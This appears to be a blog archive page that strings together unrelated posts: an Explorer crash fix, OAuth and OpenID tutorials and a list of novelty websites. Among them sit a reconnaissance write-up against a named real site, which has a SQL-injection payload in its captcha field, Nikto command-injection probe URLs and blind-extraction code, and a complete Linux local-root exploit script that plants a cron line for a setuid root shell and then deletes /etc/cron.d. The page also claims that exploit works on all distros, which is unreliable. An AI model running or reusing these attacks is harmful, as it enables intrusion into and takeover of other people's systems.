Archive for the ‘Uncategorized’ Category


If Windows Explorer keeps crashing (restarting) and showing "checking for solutions", open Event Viewer (Start menu - Control Panel\All Control Panel Items\Administrative Tools\Event Viewer), look in the Windows Logs > Application log and read the details of the Error entry; it will look like this:

Error, Event ID 1000 (Application Error)

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0x1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:\Windows\explorer.exe
Faulting module path: C:\Program Files\DivX\DivX Plus Media Foundation Components\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary solution: uninstall DivX (the faulting module path points at its Media Foundation component).

As the log shows, the problem is easy to fix once you know where to look. Be aware, though, that the faulting module is not always a harmless codec: the DLL Explorer loaded could be a shell extension belonging to a larger product, or it could be malware. Check the module path, its publisher signature and its hash before deciding that uninstalling the product is enough.
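As an added example (not part of the original post), the following Python triages Event ID 1000 bodies like the one above: it parses the "Faulting ..." fields, names the exception code, and flags modules that live outside the Windows directory or under a user-writable path, which is the check suggested above. The three sample event bodies are constructed; only the first mirrors the entry on this page, the other two are made up, and the classification rules are the editor's, not Microsoft's.

```python
import re
from collections import Counter

# Constructed sample bodies of Application-log Event ID 1000 entries in the
# layout shown above. Only the first mirrors the entry on this page; the
# other two are made up to exercise the classifier.
SAMPLE_EVENTS = [
    "Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7\n"
    "Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66\n"
    "Exception code: 0xc0000005\n"
    "Fault offset: 0x0009b8a1\n"
    "Faulting process id: 0x1120\n"
    "Faulting application path: C:\\Windows\\explorer.exe\n"
    "Faulting module path: C:\\Program Files\\DivX\\DivX Plus Media Foundation Components\\DivXMFSource.dll\n",
    "Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7\n"
    "Faulting module name: ntdll.dll, version: 6.1.7601.17514, time stamp: 0x4ce7ba58\n"
    "Exception code: 0xc0000374\n"
    "Fault offset: 0x000c3abb\n"
    "Faulting process id: 0x0a2c\n"
    "Faulting application path: C:\\Windows\\explorer.exe\n"
    "Faulting module path: C:\\Windows\\SYSTEM32\\ntdll.dll\n",
    "Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7\n"
    "Faulting module name: shlext.dll, version: 0.0.0.0, time stamp: 0x00000000\n"
    "Exception code: 0xc0000005\n"
    "Fault offset: 0x00001337\n"
    "Faulting process id: 0x1f40\n"
    "Faulting application path: C:\\Windows\\explorer.exe\n"
    "Faulting module path: C:\\Users\\bob\\AppData\\Local\\Temp\\shlext.dll\n",
]

# "Key: value" lines; the key is everything up to the first ": ".
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): (?P<value>.*)$", re.MULTILINE)

# NTSTATUS values commonly seen in Event 1000 entries.
EXCEPTION_NAMES = {
    "0xc0000005": "STATUS_ACCESS_VIOLATION",
    "0xc0000374": "STATUS_HEAP_CORRUPTION",
    "0xc00000fd": "STATUS_STACK_OVERFLOW",
}

# Path fragments a legitimate shell extension or codec has no business living in.
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\programdata\\")


def parse_event_1000(body):
    """Return the 'Faulting ...' / 'Exception code' fields of one event body as a dict."""
    return {m.group("key").strip(): m.group("value").strip()
            for m in FIELD_RE.finditer(body)}


def classify(record, system_root="C:\\Windows"):
    """Decide what the faulting module tells us and what to do next."""
    module_path = record.get("Faulting module path", "")
    low = module_path.lower()
    in_windows = low.startswith(system_root.lower() + "\\")
    verdict = {
        "module": module_path.rsplit("\\", 1)[-1],
        "exception": EXCEPTION_NAMES.get(record.get("Exception code", "").lower(), "unknown"),
        "third_party": not in_windows,
        "user_writable_location": any(tag in low for tag in USER_WRITABLE),
    }
    if verdict["user_writable_location"]:
        verdict["action"] = "investigate: verify the module's signature and hash before trusting it"
    elif verdict["third_party"]:
        verdict["action"] = "uninstall or update the product that ships the module"
    else:
        verdict["action"] = "a Windows component faulted: look for another loaded extension or a system problem"
    return verdict


def summarize(bodies):
    """Crashes per faulting module across a batch of Event 1000 bodies."""
    return Counter(classify(parse_event_1000(b))["module"] for b in bodies)


if __name__ == "__main__":
    for body in SAMPLE_EVENTS:
        v = classify(parse_event_1000(body))
        print("%-20s %-26s %s" % (v["module"], v["exception"], v["action"]))
```

On a real machine the bodies would come from the Application log (for example exported from Event Viewer or read with Get-WinEvent); the rules here only look at where the module lives, so a signed third-party DLL in Program Files and an unsigned one in %TEMP% get different advice.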

p.s. This error had to be posted here because the Microsoft site has changed to only accept bug reports for software under evaluation :)

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

The index.php response headers carry an Expires date that is long past. Note that Thu, 19 Nov 1981 08:52:00 GMT is the fixed value PHP's session handler sends with its default "nocache" cache limiter, together with the Pragma and Cache-Control lines below, so on its own it only tells you that the page calls session_start(); the more useful fingerprint is X-Powered-By: PHP/5.2.17, a branch that was already end-of-life at the time of the scan:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>

Blind SQLi in captcha!

During a few scans with BackTrack, here's a vulnerability I found on their site. This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Exported HTTP Request from W3AF</title>
</head>
<body>
<form action="http://ncc.co.uk/index.php" method="POST">
<label>website</label>
<input type="text" name="website" value="http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I'm home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<!-- the injected field; the quotes are entity-encoded so the form submits the payload 84" OR "84"="84 intact -->
<input type="text" name="captcha" value="84&quot; OR &quot;84&quot;=&quot;84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>
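As an added example (not from the original post or from w3af), the following Python shows why the payload in the captcha field matters. It assumes, as w3af's report implies but the page does not prove, that the captcha answer is looked up with a SQL query built by string concatenation. The in-memory SQLite table, the stored answer "17" and the vulnerable/fixed check functions are all constructed for the example; the token value is the one from the exported request above. MySQL accepts double quotes as string delimiters, which is why the page's payload uses them; SQLite does not reliably, so the example uses single quotes.

```python
import sqlite3

# Constructed backing store for the captcha check. The token value is the
# one in the exported request above; the stored answer is made up.
CAPTCHA_TOKEN = "4e49734857717649364c72367738453d"
CAPTCHA_ANSWER = "17"


def build_db():
    """In-memory SQLite table standing in for the site's captcha store."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE captcha (token TEXT PRIMARY KEY, answer TEXT)")
    con.execute("INSERT INTO captcha VALUES (?, ?)", (CAPTCHA_TOKEN, CAPTCHA_ANSWER))
    con.commit()
    return con


def captcha_ok_vulnerable(con, token, answer):
    """The pattern w3af is probing for: user input spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM captcha WHERE token='%s' AND answer='%s'" % (token, answer)
    return con.execute(sql).fetchone()[0] > 0


def captcha_ok_fixed(con, token, answer):
    """Same check with bound parameters: the input can only ever be a value."""
    sql = "SELECT COUNT(*) FROM captcha WHERE token=? AND answer=?"
    return con.execute(sql, (token, answer)).fetchone()[0] > 0


def blind_extract_answer(con, max_len=8, alphabet="0123456789"):
    """Boolean-blind extraction: the only feedback is whether the captcha
    check passed, yet that is enough to read the stored answer character
    by character through the vulnerable query."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # Makes the WHERE clause true exactly when character `pos` of
            # the first stored answer equals `ch`; the token is deliberately wrong.
            probe = "' OR substr((SELECT answer FROM captcha LIMIT 1),%d,1)='%s" % (pos, ch)
            if captcha_ok_vulnerable(con, "no-such-token", probe):
                found += ch
                break
        else:
            break  # no character matched: end of the stored value
    return found


if __name__ == "__main__":
    con = build_db()
    tautology = "84' OR '84'='84"
    print("vulnerable, tautology:", captcha_ok_vulnerable(con, CAPTCHA_TOKEN, tautology))
    print("fixed, tautology:     ", captcha_ok_fixed(con, CAPTCHA_TOKEN, tautology))
    print("blind-extracted answer:", blind_extract_answer(con))
```

The tautology is what the w3af request sends: it makes the WHERE clause true for every row, so the captcha is bypassed. The blind_extract_answer function shows the "blind" part, pulling the stored value out one character at a time with nothing but pass/fail responses; the parameterised version rejects both payloads because the input never becomes SQL.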

Nikto reported 19 items. Treat these as signature matches, not confirmed vulnerabilities: the vBulletin calendar and Avenger's News System entries below, for example, fire on paths a site can answer with a 200 for reasons other than running that software, so each one needs a manual request to confirm before it counts as a finding.

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1′, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Screenshot

# Date: 6/26/12
# Version: 3.x.x
# Category:: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + effected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others ...
# ~
# Use this at your own risk, I'm not responsible for any risk.
# sorchfox@hotmail.com
#
# Mechanism: getsuid forks a child that chdir()s into /etc/cron.d, marks
# itself dumpable with PR_SET_DUMPABLE=2 and is then killed with SIGSEGV.
# With the core limit raised to unlimited, the kernel writes the child's
# core file, which contains the crontab line held in the payload string,
# as root into /etc/cron.d/core. cron skips the binary garbage, honours
# the crontab line, and within a minute makes /tmp/s set-uid root.

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/* Never written anywhere on purpose: it only has to be present in the
 * child's memory image so that it ends up inside the core file. */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);   /* allow a core dump of any size */
    if ( !( child = fork() )) {
        chdir("/etc/cron.d");             /* core files are written to the cwd */
        prctl(PR_SET_DUMPABLE, 2);        /* the flawed value: dump as root */
        sleep(200);
        exit(1);
    }
    kill(child, SIGSEGV);                 /* force the core dump */
    sleep(120);                           /* give cron time to run the line */
    return 0;
}
__EOF__

cat > /tmp/s.c << __EOF__
#include <stdlib.h>
#include <unistd.h>

/* Once set-uid root by cron, drops into a root shell and cleans up. */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/sh");
    system("rm -rf /tmp/s");
    system("rm -rf /etc/cron.d/*");
    return 0;
}
__EOF__
echo "wait approx 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

2-legged vs. 3-legged OAuth

Posted: January 12, 2012 in Uncategorized

From the emails I receive it seems there is some confusion about what the terms 2-legged OAuth and 3-legged OAuth mean. I hope this article clears it up (and does not add to the confusion...).

In short, they describe two different usage scenarios of OAuth, involving two and three parties respectively.

3-legged OAuth describes the scenario OAuth was originally developed for: a resource owner wants to give a client access to a server without sharing his credentials (i.e. username/password). A typical example is a user (resource owner) who wants to give a third-party application (client) access to his Twitter account (server).

On a conceptual level it works as follows:

  1. The client has signed up with the server and obtained its client credentials (also known as "consumer key and secret") ahead of time.
  2. The user wants to give the client access to his protected resources on the server.
  3. The client retrieves temporary credentials (also known as a "request token") from the server.
  4. The client redirects the resource owner to the server.
  5. The resource owner grants the client access to his protected resources on the server.
  6. The server redirects the user back to the client.
  7. The client uses the temporary credentials to retrieve the token credentials (also known as an "access token") from the server.
  8. The client uses the token credentials to access the protected resources on the server.

2-legged OAuth, on the other hand, describes a plain client-server scenario with no user involved. An example would be a local Twitter client application accessing your own Twitter account.

On a conceptual level, 2-legged OAuth consists of just the first and last steps of 3-legged OAuth:

  1. The client has signed up with the server and obtained its client credentials (also known as "consumer key and secret").
  2. The client uses its client credentials (and empty token credentials) to access the protected resources on the server. With no token secret, the signing key reduces to the client secret alone, so the server is authenticating the client software, not any particular user.

Above I used Twitter as an example, though strictly speaking they don't use 2-legged OAuth but a variant of it: they provide not only the client credentials but also the token credentials (see also Using one access token with OAuth).

As you have seen, 2-legged OAuth is nothing new; it is simply OAuth used in a different scenario than the one it was designed for. Hence you can use (almost?) all existing OAuth libraries for 2-legged OAuth, too.
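As an added example (editor's code, not from this article or any OAuth library), the following Python implements the part of OAuth 1.0 that both scenarios share: the client builds the signature base string and HMAC-SHA1 signature from RFC 5849, and the server recomputes it, checks the timestamp and rejects replayed nonces. The only difference between 3-legged and 2-legged is whether an oauth_token and its secret take part, which is visible in the key used by hmac_sha1_signature. The base string is checked against the worked example in RFC 5849 section 3.4.1; the client and token secrets, URLs and nonces are constructed for the example.

```python
import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qsl, quote, unquote, urlsplit


def pct(s):
    """RFC 5849 percent-encoding: only unreserved characters are left alone."""
    return quote(str(s), safe="-._~")


def signature_base_string(method, url, params):
    """method & base-URL & normalized(query + body + oauth_* parameters)."""
    parts = urlsplit(url)
    base_url = "%s://%s%s" % (parts.scheme.lower(), parts.netloc.lower(), parts.path)
    pairs = list(parse_qsl(parts.query, keep_blank_values=True)) + list(params)
    encoded = sorted((pct(k), pct(v)) for k, v in pairs)  # sort by name, then value
    normalized = "&".join("%s=%s" % kv for kv in encoded)
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def hmac_sha1_signature(base, client_secret, token_secret=""):
    """Key is client_secret '&' token_secret; 2-legged leaves the right side empty."""
    key = pct(client_secret) + "&" + pct(token_secret)
    mac = hmac.new(key.encode(), base.encode(), hashlib.sha1).digest()
    return base64.b64encode(mac).decode()


def sign_request(method, url, body_params, client_key, client_secret,
                 token=None, token_secret="", nonce=None, timestamp=None):
    """Client side. Returns (Authorization header, base string, signature)."""
    oauth = [
        ("oauth_consumer_key", client_key),
        ("oauth_signature_method", "HMAC-SHA1"),
        ("oauth_timestamp", str(int(time.time()) if timestamp is None else timestamp)),
        ("oauth_nonce", nonce or secrets.token_hex(8)),
    ]
    if token is not None:  # 3-legged: the access token ties the call to a user's grant
        oauth.append(("oauth_token", token))
    base = signature_base_string(method, url, list(body_params) + oauth)
    sig = hmac_sha1_signature(base, client_secret, token_secret)
    header = "OAuth " + ", ".join('%s="%s"' % (pct(k), pct(v))
                                  for k, v in oauth + [("oauth_signature", sig)])
    return header, base, sig


def parse_authorization(header):
    """Split an 'OAuth k="v", ...' header back into decoded parameters."""
    if not header.startswith("OAuth "):
        raise ValueError("not an OAuth header")
    out = {}
    for part in header[len("OAuth "):].split(", "):
        k, v = part.split("=", 1)
        if k != "realm":  # realm is not part of the signed parameters
            out[unquote(k)] = unquote(v.strip('"'))
    return out


def verify_request(method, url, body_params, header, client_secrets, token_secrets,
                   seen_nonces, now, max_skew=300):
    """Server side: recompute the signature from the secrets on file, then
    reject stale timestamps and any (client, nonce, timestamp) seen before."""
    recv = parse_authorization(header)
    sig = recv.pop("oauth_signature", None)
    client_secret = client_secrets.get(recv.get("oauth_consumer_key"))
    token = recv.get("oauth_token")
    if sig is None or client_secret is None or recv.get("oauth_signature_method") != "HMAC-SHA1":
        return False
    if token is not None and token not in token_secrets:
        return False
    token_secret = token_secrets[token] if token is not None else ""  # 2-legged: empty
    ts = recv.get("oauth_timestamp", "")
    if not ts.isdigit() or abs(now - int(ts)) > max_skew:
        return False
    replay_key = (recv["oauth_consumer_key"], recv.get("oauth_nonce"), ts)
    if replay_key in seen_nonces:
        return False
    base = signature_base_string(method, url, list(body_params) + list(recv.items()))
    if not hmac.compare_digest(hmac_sha1_signature(base, client_secret, token_secret), sig):
        return False
    seen_nonces.add(replay_key)
    return True
```

Both sides must normalise identically, which is why the client and server share signature_base_string. The nonce and timestamp checks are what stop a captured 2-legged request from being replayed; without them, the signature alone only proves that someone holding the client secret sent it at some point.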

http://feedproxy.google.com/~r/readwriteweb/hack/~3/DSIyH9E_nV8/create-an-html5-game-win-30k-a.php

To secure a website, we usually create a user database and build a login page to authenticate users. If you run several websites, creating a separate login for each one is time consuming and unpopular with your users, because they have to log in to each site separately. OpenID was developed to solve this authentication hassle. It is an open standard that lets developers authenticate their users in a decentralized manner; for end users, it lets them consolidate their digital identities. Major web services that support OpenID include Google, Yahoo and Facebook. If you use OpenID on your website, users can log in with their Google, Yahoo or Facebook accounts. Authentication is handled by the OpenID provider, so you don't need to keep user credentials on your side, only the identifier the provider returns. In this article I show an ASP.NET sample I wrote that uses OpenID authentication to verify a Google account. It is built on the C# library DotNetOpenAuth. Here is the step-by-step procedure for adding it to your ASP.NET application.

  1. Download the DotNetOpenAuth libraries. Choose the version that matches your development platform.
  2. Extract the downloaded archive to your hard drive.
  3. In your project, add a reference to "DotNetOpenAuth.dll".
  4. In your login page's HTML, paste the following.


<form id="form1" runat="server">
    <div id="loginform">
        <div id="NotLoggedIn" runat="server">
            Log in with <img src="http://www.google.com/favicon.ico" />
            <asp:Button ID="btnLoginToGoogle" Runat="server" Text="Google" OnCommand="OpenLogin_Click"
                CommandArgument="https://www.google.com/accounts/o8/id" />
            <asp:Label runat="server" ID="lblAlertMsg" />
        </div>
    </div>
</form>

Take note of the URL https://www.google.com/accounts/o8/id: this is Google's OpenID provider identifier, the address the relying party runs discovery against.

  5. Add the following using directives to the page's code-behind.

using DotNetOpenAuth.OpenId;
using DotNetOpenAuth.OpenId.RelyingParty;

  6. In Page_Load and OpenLogin_Click, use the following code.

protected void Page_Load(object sender, EventArgs e)
{
    // On the round trip back from Google the provider's response is in the request;
    // GetResponse() returns null on the initial, unauthenticated page load.
    OpenIdRelyingParty rp = new OpenIdRelyingParty();
    var r = rp.GetResponse();
    if (r != null)
    {
        switch (r.Status)
        {
            case AuthenticationStatus.Authenticated:
                NotLoggedIn.Visible = false;
                // ClaimedIdentifier is the stable, provider-asserted identity: key your
                // user records on it, not on a display name or e-mail address.
                Session["GoogleIdentifier"] = r.ClaimedIdentifier.ToString();
                Response.Redirect("Main.aspx"); // redirect to the main page of your website
                break;
            case AuthenticationStatus.Canceled:
                lblAlertMsg.Text = "Cancelled.";
                break;
            case AuthenticationStatus.Failed:
                lblAlertMsg.Text = "Login Failed.";
                break;
        }
    }
}

protected void OpenLogin_Click(object src, CommandEventArgs e)
{
    string discoveryUri = e.CommandArgument.ToString();
    OpenIdRelyingParty openid = new OpenIdRelyingParty();
    // Realm and return_to are both this page's own URL with the query string removed,
    // so the provider sends the user back here and Page_Load handles the response.
    var b = new UriBuilder(Request.Url) { Query = "" };
    var req = openid.CreateRequest(discoveryUri, b.Uri, b.Uri);
    req.RedirectToProvider();
}

  7. Run the project. It should look like the following screens.

[Screenshot: the "Log in with Google" button] Now the login page looks like this.

My new avatar

Posted: December 16, 2011 in Uncategorized

image

http://feeds.techie-buzz.com/~r/techiebuzz/~3/Sef7PXotbec/facebook-says-timeline-is-a-generic-word.html

How is the world on the other side, you bored go-getters? I know a time can come when you just don't know what else to do. There comes a time in life when you don't want to go offline, because you are addicted to the internet, but you don't know what to do because you seem to have surfed almost all of it. If you are still reading this, I assume you are someone who will give up on their youth if not shown a way..err..to kill their precious time. Worry not. I will introduce you to some of the most amazing websites that provide a quick cure for boredom.

14 Unusual Websites To Kill Time With When Bored

Neave

Paul Neave seems to have worked hard to come up with his share of amazing Flash websites: a collection of unique Flash games to keep you engrossed.

Papervision3D

Tickle the fish and they swim away. Enjoy underwater life in this Flash-based website, and remember to tickle the shark out there. You might not get such a chance in real life.

Bio-Bak

One of the most bizarre ideas that could have hit a web designer. This website is the result of a lot of hard work and planning. For you it will surely be a fun and nice way to kill time.

Donnie Darko

You must have seen plenty of movie websites, but none would have been planned the way this one was. The website is full of mysterious stuff and draws the visitor in. You might find it a bit slow compared to the rest of this list, but I guess the movie was also mysterious and slow!

Google Gravity

This website does not have much to do, but it must be visited once, especially by those who always wanted Google to fall. See your dream come true, almost!

Ball Droppings

Ball Droppings is an unusually engrossing Flash-based game where you get to save a lot of balls that keep popping up. I was lost in the website for almost 15 minutes before I realized I had to wrap up this list.

Bank of Imagination

Bank of Imagination is a unique Flash website where one can leave his/her own idea of what the world could be, or anything else. Really, check the portal to see what the world is imagining.

Salt Films

Salt Films has a website full of salt, and still it tastes delicious. The creative animation and plenty of options will keep you busy for a long time.

Forgotten Bookmarks

Forgotten Bookmarks isn't one of those Flash-based web games, but it surely has enough to keep you engrossed. See how far human imagination can go when it comes to designing bookmarks.

Bean Crusher

Did you ever think that crushing beans could be fun? Well, it will be once you visit this Flash-based website. These beans will surely become tougher to hit as you move ahead in the game.

Why Do You Stay Up So Late?

The question is obvious. Why do you stay up so late? This Flash-based website is a blend of poetry and Flash animation, something that makes you fall in love with it.

The Infinite Oz

You know, I had this website open for almost an hour and it kept showing one thing or another that was of interest. The Flash, the planning and the execution of this website are by far the best I have seen so far. Surreal.

Neon Bible

The interactive video can be attractive and might just catch you staring at it for long. Be warned!

Incredibox

Bored? How about launching your own band? I mean, just for fun and just for some time, you surely can enjoy your own band. Right?

Conclusion

As a wrap-up, let me warn you that the internet is full of stuff that is interesting but of no use. These websites can be good for a while, but don't neglect the things that matter most to you just because you were lost in these weirdly amazing websites.

Google Engage

Posted: November 28, 2011 in Uncategorized

How would you like to receive free Google AdWords vouchers?

All you have to do is –

Have something to advertise

Authorise my access to make your life easier

And that’s it!

Contact me for more details.